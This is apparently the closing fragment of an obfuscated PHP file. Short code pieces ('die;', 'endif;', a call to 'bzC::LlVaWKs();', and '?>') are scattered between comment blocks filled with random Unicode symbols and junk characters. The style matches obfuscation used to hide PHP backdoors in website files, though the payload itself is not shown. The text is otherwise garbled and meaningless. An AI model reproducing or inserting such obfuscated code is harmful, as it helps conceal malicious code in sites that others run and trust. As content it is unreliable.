☾∔☓✺㊯£♭◜╨➢◠⏥③◁→ⅶⓝ¢


6<;☾∔☓✺㊯£♭◜╨➢◠⏥③◁→ⅶⓝ¢


-*///
die;/*-RB{nGH-*///
 endif;/*-


㈣←╕┤ⓩ➍┧⋲⇇┰✞⑾⒕


77JKl8q㈣←╕┤ⓩ➍┧⋲⇇┰✞⑾⒕


-*///
 }/*->u})k,yE-*///
}/*-


↸㊟∜⓫⓰⇎㏑⅛㊞ㄨ✑≯⋢∾└≴◪⓪➁≠«┞⓻∦


4Ex)h9JqH↸㊟∜⓫⓰⇎㏑⅛㊞ㄨ✑≯⋢∾└≴◪⓪➁≠«┞⓻∦


-*///
bzC/*-


≛⋞↦❼┶☍ℤ≴ⓚ〉ⓞ⅗⋍✝


za?≛⋞↦❼┶☍ℤ≴ⓚ〉ⓞ⅗⋍✝


-*///
::/*-`[uDeG?(-*///
LlVaWKs/*-

❺☤ℯ∍❆›Ü⇡♓⇄╖♤

|LqU%v,❺☤ℯ∍❆›Ü⇡♓⇄╖♤

-*///
();/*-
◎﹫﹪⇃⑲⊎♋Ⓢ
DBb◎﹫﹪⇃⑲⊎♋Ⓢ
-*///
 ?>